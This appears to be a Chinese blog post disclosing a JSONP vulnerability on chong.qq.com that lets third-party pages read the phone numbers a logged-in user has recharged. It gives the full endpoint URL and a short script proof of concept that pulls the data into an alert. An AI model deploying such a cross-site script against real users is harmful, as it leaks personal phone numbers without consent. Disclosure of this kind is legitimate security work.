JSONP窃取用户手机号

漏洞详情

被TSRC忽略了 理由是危害小。。
一、详细说明:

http://chong.qq.com/

只要通过这个站冲过话费的号码都可以被第三方网站嵌入jsonp页面读取出来
不知道其他的充值接口是不是也是这个
查询接口:http://chong.qq.com/tws/record/gethisphone4?func=getHisPhoneCallback&flag=1&dtag=1457667669835&g_tk=&g_ty=ls
g_tk可以为空,referer也没有做检测

二、漏洞证明:

 <script> function getHisPhoneCallback(data){ alert(JSON.stringify(data)); } </script> <script src="http://chong.qq.com/tws/record/gethisphone4?func=getHisPhoneCallback&flag=1&dtag=1457667669835&g_tk=&g_ty=ls"></script>


这是我用我的大号测试的

同时我用小号登录 直接访问会弹出一个空白框。
那是因为小号没有充值记录
于是我用小号给一个姑娘充了10块话费
然后再次访问
成功获取到了手机号

发表评论

电子邮件地址不会被公开。 必填项已用 * 标注

*

您可以使用这些 HTML 标签和属性: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>